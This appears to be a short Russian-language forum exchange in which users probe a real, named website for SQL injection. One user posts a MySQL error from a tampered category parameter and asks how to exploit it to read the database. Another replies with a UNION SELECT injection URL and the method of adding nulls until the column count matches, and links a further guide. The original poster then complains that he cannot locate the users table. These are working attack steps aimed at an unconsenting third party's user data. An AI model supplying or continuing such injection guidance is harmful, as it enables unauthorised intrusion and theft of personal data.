http://www.freespaces.com/categories.php?categoryid=20

http://www.freespaces.com/categories.php?categoryid=hhh

MySQL Error
Unable to execute MySQL query. The following error occurred: Unknown column 'hhh' in 'where clause'


Это уязвимость? Если да ,то как использовать? можно просмотреть базу данных?

_http://www.freespaces.com/categories.php?categoryid=-1%20UNION%20SELECT%20null/*

Unable to execute MySQL query. The following error occurred: The used SELECT statements have a different number of columns

Пробуй подставлять последовательно null, пока не получишь верный запрос:

Тебе сюда (http://forum.antichat.ru/thread7118.html)

Я так найти то не могу название таблиц где пользователи!